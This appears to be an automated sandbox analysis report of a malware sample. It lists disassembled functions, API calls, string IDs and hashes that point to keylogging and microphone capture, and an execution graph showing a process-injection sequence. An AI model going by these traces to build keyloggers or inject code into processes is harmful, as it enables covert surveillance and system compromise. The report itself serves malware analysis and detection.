                                                                                                                                                                                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LocalTime
                                                                                                                                                                                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                                                                                            • API String ID: 481472006-1507639952
                                                                                                                                                                                                                                            • Opcode ID: ea70252bfee1193fa070b6ce61b16917ee96d00f5fb0952583a0e38783224c42
                                                                                                                                                                                                                                            • Instruction ID: 8fc2066b5dd234cef981570443e677007340a491061b3c72667858eadfbc0999
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea70252bfee1193fa070b6ce61b16917ee96d00f5fb0952583a0e38783224c42
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF2129A1A042806BC310FB6A980676B7B9457D1315F48417EF948532E2EB3C5999CB9F
                                                                                                                                                                                                                                            Function 0041A696 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LocalTime
                                                                                                                                                                                                                                            • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                                                                                                                                            • API String ID: 481472006-2430845779
                                                                                                                                                                                                                                            • Opcode ID: c1104856b329bac52de9abd69d1e93ca30ee683114df54cf724c85b3f010b06d
                                                                                                                                                                                                                                            • Instruction ID: f196d4ed1927782274832919bda13c77b2b6189c6c06a517aeeeb96a95a688aa
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1104856b329bac52de9abd69d1e93ca30ee683114df54cf724c85b3f010b06d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81114C725082045AC704EBA5D8568AF73E8EB94708F10053FFC85931E1EF38DA84C69E
                                                                                                                                                                                                                                            Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                                                                                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                                                                                                                                                            • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                                                                                                                            • String ID: Online Keylogger Stopped
                                                                                                                                                                                                                                            • API String ID: 1623830855-1496645233
                                                                                                                                                                                                                                            • Opcode ID: a6ae9b93d039332b163c31e72d4f3da944da033372009bc833185b2393ae89fc
                                                                                                                                                                                                                                            • Instruction ID: 9ca866747e1af720c58b6b078daeda0145c7b5fd7bd766bf2ea1503866da158c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6ae9b93d039332b163c31e72d4f3da944da033372009bc833185b2393ae89fc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8101D431A043019BDB25BB35C80B7AEBBB19B45315F40407FE481275D2EB7999A6C3DB
                                                                                                                                                                                                                                            Function 004016E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B90,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                                                                                                                                                            • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: wave$BufferHeaderPrepare
                                                                                                                                                                                                                                            • String ID: T=G
                                                                                                                                                                                                                                            • API String ID: 2315374483-379896819
                                                                                                                                                                                                                                            • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                                                                                                                                                                                            • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                                                                                                                                                            Function 004477A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • IsValidLocale.KERNEL32(00000000,z=D,00000000,00000001,?,?,00443D7A,?,?,?,?,00000004), ref: 004477EC
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LocaleValid
                                                                                                                                                                                                                                            • String ID: IsValidLocaleName$z=D
                                                                                                                                                                                                                                            • API String ID: 1901932003-2791046955
                                                                                                                                                                                                                                            • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                                                                                                                            • Instruction ID: b87742f2873dd73c0a7d5aade023b210d3410e3306d67f57874115e62e910f2b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72F0E930A45318F7DA106B659C06F5E7B54CF05711F50807BFD046A283CE796D0285DC
                                                                                                                                                                                                                                            Function 00401D91 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                                                                                                            • String ID: T=G$T=G
                                                                                                                                                                                                                                            • API String ID: 3519838083-3732185208
                                                                                                                                                                                                                                            • Opcode ID: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
                                                                                                                                                                                                                                            • Instruction ID: f0e76400c825ed045590d0aed9209fb7c3a86c2d0af9b05bbbbea7315d156e8c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77F0E971A00221ABC714BB65C80569EB774EF4136DF10827FB416B72E1CBBD5D04D65D
                                                                                                                                                                                                                                            Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                                                                                                                                                              • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                                                                                                                                                              • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                                                                                                                                              • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                                                                                                                                              • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                                                                                                                                              • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                                                                                                                                                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                                                                                                                                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                                                                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                                                                                                                            • String ID: [AltL]$[AltR]
                                                                                                                                                                                                                                            • API String ID: 2738857842-2658077756
                                                                                                                                                                                                                                            • Opcode ID: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                                                                                                                                                                                                            • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                                                                                                                                                                            Function 00448813 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00448835
                                                                                                                                                                                                                                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast_free
                                                                                                                                                                                                                                            • String ID: `@$`@
                                                                                                                                                                                                                                            • API String ID: 1353095263-20545824
                                                                                                                                                                                                                                            • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                                                                                                                                            • Instruction ID: fd413ccac38a9f67c3de8d393d9e933a11814297f80871467d1a397382efd299
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4DE06D371006059F8720DE6DD400A86B7E5EF95720720852AE89DE3710D731E812CB40
                                                                                                                                                                                                                                            Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: State
                                                                                                                                                                                                                                            • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                                                                                                            • API String ID: 1649606143-2446555240
                                                                                                                                                                                                                                            • Opcode ID: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                                                                                                                                                                                                            • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                                                                                                                                                            Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,J@4fF,00412951,00000000,00000000,J@4fF,?,00000000), ref: 00412988
                                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(00000000,?,?,00000000), ref: 00412998
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DeleteOpenValue
                                                                                                                                                                                                                                            • String ID: J@4fF
                                                                                                                                                                                                                                            • API String ID: 2654517830-1060276034
                                                                                                                                                                                                                                            • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                                                                                                                            • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                                                                                                                                                            Function 0043FA6E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FB04
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0043FB12
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB6D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1717984340-0
                                                                                                                                                                                                                                            • Opcode ID: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                                                                                                                                                                                                            • Instruction ID: 94dc36b571f96c0084dd62d2177e44ea0606df48237064e9d41db09688609199
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66413870E00206AFCF219F64C854A6BF7A9EF09320F1451BBF8585B2A1E738AC09C759

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:9.7%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                                                            Total number of Nodes:172
                                                                                                                                                                                                                                            Total number of Limit Nodes:11
                                                                                                                                                                                                                                            execution_graph 56759 6e095d0 56762 6e095d2 56759->56762 56760 6e0975b 56762->56760 56763 6e02898 56762->56763 56764 6e09850 PostMessageW 56763->56764 56766 6e098bc 56764->56766 56766->56762 56755 2917880 56756 29178ce DrawTextExW 56755->56756 56758 2917926 56756->56758 56702 eb4668 56703 eb467a 56702->56703 56704 eb4686 56703->56704 56706 eb4778 56703->56706 56707 eb479d 56706->56707 56711 eb4888 56707->56711 56715 eb4878 56707->56715 56712 eb48af 56711->56712 56714 eb498c 56712->56714 56719 eb449c 56712->56719 56716 eb48af 56715->56716 56717 eb498c 56716->56717 56718 eb449c CreateActCtxA 56716->56718 56717->56717 56718->56717 56720 eb5918 CreateActCtxA 56719->56720 56722 eb59db 56720->56722 56722->56722 56723 6d228d8 56724 6d22912 56723->56724 56725 6d229a3 56724->56725 56726 6d2298e 56724->56726 56728 6d21f1c 3 API calls 56725->56728 56731 6d21f1c 56726->56731 56730 6d229b2 56728->56730 56733 6d21f27 56731->56733 56732 6d22999 56733->56732 56736 6d232e7 56733->56736 56742 6d232f8 56733->56742 56737 6d23312 56736->56737 56748 6d21f64 56736->56748 56739 6d2331f 56737->56739 56740 6d23348 CreateIconFromResourceEx 56737->56740 56739->56732 56741 6d233c6 56740->56741 56741->56732 56743 6d21f64 CreateIconFromResourceEx 56742->56743 56744 6d23312 56743->56744 56745 6d2331f 56744->56745 56746 6d23348 CreateIconFromResourceEx 56744->56746 56745->56732 56747 6d233c6 56746->56747 56747->56732 56749 6d23348 CreateIconFromResourceEx 56748->56749 56750 6d233c6 56749->56750 56750->56737 56751 ebbfe0 56752 ebc028 GetModuleHandleW 56751->56752 56753 ebc022 56751->56753 56754 ebc055 56752->56754 56753->56752 56767 ebe080 56768 ebe0c6 56767->56768 56771 ebe260 56768->56771 56774 ebde58 56771->56774 56775 ebe2c8 DuplicateHandle 56774->56775 56776 ebe1b3 56775->56776 56777 6e0651c 56778 6e06522 56777->56778 56782 6e083f0 56778->56782 56799 6e083e1 56778->56799 56779 6e06530 56783 6e0840a 56782->56783 56816 6e08ce4 56783->56816 56820 6e08d1e 56783->56820 56825 6e08c3d 56783->56825 56829 6e08719 56783->56829 56834 6e08818 56783->56834 56839 6e08c57 56783->56839 56844 6e08af7 56783->56844 56849 6e08b75 56783->56849 56854 6e08a34 56783->56854 56859 6e08c91 56783->56859 56864 6e08d30 56783->56864 56872 6e08b09 56783->56872 56876 6e08fe9 56783->56876 56880 6e09366 56783->56880 56784 6e0842e 56784->56779 56800 6e083f0 56799->56800 56802 6e08ce4 2 API calls 56800->56802 56803 6e09366 2 API calls 56800->56803 56804 6e08fe9 2 API calls 56800->56804 56805 6e08b09 2 API calls 56800->56805 56806 6e08d30 4 API calls 56800->56806 56807 6e08c91 2 API calls 56800->56807 56808 6e08a34 2 API calls 56800->56808 56809 6e08b75 2 API calls 56800->56809 56810 6e08af7 2 API calls 56800->56810 56811 6e08c57 2 API calls 56800->56811 56812 6e08818 2 API calls 56800->56812 56813 6e08719 2 API calls 56800->56813 56814 6e08c3d 2 API calls 56800->56814 56815 6e08d1e 2 API calls 56800->56815 56801 6e0842e 56801->56779 56802->56801 56803->56801 56804->56801 56805->56801 56806->56801 56807->56801 56808->56801 56809->56801 56810->56801 56811->56801 56812->56801 56813->56801 56814->56801 56815->56801 56817 6e08c44 56816->56817 56884 6e056b0 56817->56884 56888 6e056b8 56817->56888 56821 6e08e8a 56820->56821 56892 6e05ba0 56821->56892 56896 6e05b99 56821->56896 56822 6e0896d 56822->56784 56826 6e08c43 56825->56826 56827 6e056b0 ResumeThread 56826->56827 56828 6e056b8 ResumeThread 56826->56828 56827->56826 56828->56826 56831 6e0871c 56829->56831 56830 6e088cd 56830->56784 56831->56830 56900 6e05fc0 56831->56900 56904 6e05fb5 56831->56904 56836 6e087ef 56834->56836 56835 6e088cd 56835->56784 56836->56835 56837 6e05fc0 CreateProcessA 56836->56837 56838 6e05fb5 CreateProcessA 56836->56838 56837->56836 56838->56836 56840 6e08a4b 56839->56840 56840->56839 56841 6e08939 56840->56841 56908 6e05d30 56840->56908 56912 6e05d38 56840->56912 56841->56784 56845 6e08caf 56844->56845 56847 6e05d30 WriteProcessMemory 56845->56847 56848 6e05d38 WriteProcessMemory 56845->56848 56846 6e08f44 56847->56846 56848->56846 56850 6e08b81 56849->56850 56852 6e05d30 WriteProcessMemory 56850->56852 56853 6e05d38 WriteProcessMemory 56850->56853 56851 6e092c0 56852->56851 56853->56851 56855 6e08a3a 56854->56855 56856 6e08939 56855->56856 56857 6e05d30 WriteProcessMemory 56855->56857 56858 6e05d38 WriteProcessMemory 56855->56858 56856->56784 56857->56855 56858->56855 56860 6e09007 56859->56860 56916 6e05c70 56860->56916 56920 6e05c78 56860->56920 56861 6e09025 56866 6e08d35 56864->56866 56865 6e08c44 56867 6e0922b 56865->56867 56868 6e056b0 ResumeThread 56865->56868 56869 6e056b8 ResumeThread 56865->56869 56866->56865 56870 6e05ba0 Wow64SetThreadContext 56866->56870 56871 6e05b99 Wow64SetThreadContext 56866->56871 56868->56865 56869->56865 56870->56865 56871->56865 56924 6e05e20 56872->56924 56928 6e05e28 56872->56928 56873 6e08b2e 56873->56784 56877 6e08edc 56876->56877 56877->56876 56878 6e056b0 ResumeThread 56877->56878 56879 6e056b8 ResumeThread 56877->56879 56878->56877 56879->56877 56881 6e087ef 56880->56881 56882 6e05fc0 CreateProcessA 56881->56882 56883 6e05fb5 CreateProcessA 56881->56883 56882->56881 56883->56881 56885 6e056b8 ResumeThread 56884->56885 56887 6e05729 56885->56887 56887->56817 56889 6e056f8 ResumeThread 56888->56889 56891 6e05729 56889->56891 56891->56817 56893 6e05be5 Wow64SetThreadContext 56892->56893 56895 6e05c2d 56893->56895 56895->56822 56897 6e05ba0 Wow64SetThreadContext 56896->56897 56899 6e05c2d 56897->56899 56899->56822 56901 6e06049 CreateProcessA 56900->56901 56903 6e0620b 56901->56903 56905 6e05fc0 CreateProcessA 56904->56905 56907 6e0620b 56905->56907 56909 6e05d80 WriteProcessMemory 56908->56909 56911 6e05dd7 56909->56911 56911->56840 56913 6e05d80 WriteProcessMemory 56912->56913 56915 6e05dd7 56913->56915 56915->56840 56917 6e05c78 VirtualAllocEx 56916->56917 56919 6e05cf5 56917->56919 56919->56861 56921 6e05cb8 VirtualAllocEx 56920->56921 56923 6e05cf5 56921->56923 56923->56861 56925 6e05e28 ReadProcessMemory 56924->56925 56927 6e05eb7 56925->56927 56927->56873 56929 6e05e73 ReadProcessMemory 56928->56929 56931 6e05eb7 56929->56931 56931->56873

                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                            Function 06D033F0 Relevance: .7, Instructions: 668COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 241b824095518d4a23e9615492819ed026bd296b0d6502c02690ea4a9622af19
                                                                                                                                                                                                                                            • Instruction ID: 1c1f10292c2dc4bcb454ae5a329557876703c7ac5cf4e29dbfca23ed4c99623c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 241b824095518d4a23e9615492819ed026bd296b0d6502c02690ea4a9622af19
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09520834A006158FDB58DF68C588B5DB7F2FF88314F2685A8E4469B7A1DB30ED86CB50
                                                                                                                                                                                                                                            Function 06D066BC Relevance: .6, Instructions: 636COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3f10b93212d25a6393bea126d662968e2f407322381a4f8ff8a61cf40b0443f5
                                                                                                                                                                                                                                            • Instruction ID: 43acdbf666ba247544f1f227a374771d982b2d620fdfcc316241a237f1302f4f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f10b93212d25a6393bea126d662968e2f407322381a4f8ff8a61cf40b0443f5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09426034A012059FEB54DFA8C844BAD77F2FF89310F2585A6E455EB3A1DB349D41CBA0
                                                                                                                                                                                                                                            Function 06D0E760 Relevance: .4, Instructions: 382COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 908a79cf7fd9f39f1516f357b0c812285b5587e9bd56da62cdf1511a93ceec4a
                                                                                                                                                                                                                                            • Instruction ID: 96d61036df041f92d3f2add6a50e65b5c7d598f84ad0055c2cb4e8bfd60ad29b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 908a79cf7fd9f39f1516f357b0c812285b5587e9bd56da62cdf1511a93ceec4a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D12C775D1071A8FDB54DF68C880AE9F7B1FF89300F1586AAD458A7251EB70AAC4CF90
                                                                                                                                                                                                                                            Function 06D0E752 Relevance: .4, Instructions: 372COMMON
